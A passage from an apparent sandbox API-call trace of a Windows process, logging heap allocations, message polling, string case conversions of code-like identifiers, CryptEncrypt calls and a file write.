hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.851] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xd16c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xd170) returned 1 [0162.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.851] CharLowerBuffW (in: lpsz="byte[53616]", cchLength=0xb | out: lpsz="byte[53616]") returned 0xb [0162.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.853] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.853] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.853] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.853] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.853] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.854] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.854] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34bf3c8*, pdwDataLen=0x8bef68*=0xd16c, dwBufLen=0xd170 | out: pbData=0x34bf3c8*, pdwDataLen=0x8bef68*=0xd170) returned 1 [0162.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.856] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.856] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.856] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.856] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0162.856] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.856] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0162.856] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.856] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.856] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0162.856] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.856] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0162.857] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.857] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.857] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.857] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.857] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.857] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.857] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.857] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.857] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.857] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.865] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0162.865] TranslateMessage (lpMsg=0x8bf710) returned 0 [0162.865] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0162.865] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0162.865] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0162.865] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0162.865] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0162.865] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0162.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0162.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd170) returned 0x24e4bd0 [0162.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.866] WriteFile (in: hFile=0x1e8, lpBuffer=0x24e4bd0*, nNumberOfBytesToWrite=0xd170, lpNumberOfBytesWritten=0x8bf5ec, lpOverlapped=0x0 | out: lpBuffer=0x24e4bd0*, lpNumberOfBytesWritten=0x8bf5ec*=0xd170, lpOverlapped=0x0) returned 1 [0163.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0163.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e4bd0 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.473] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0163.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0163.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.473] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0163.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0163.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0163.474] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0163.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0163.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0163.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0163.475] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.475] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.475] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.475] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0163.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0163.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0163.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0163.476] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.476] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0163.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0163.477] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.477] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0163.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.477] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 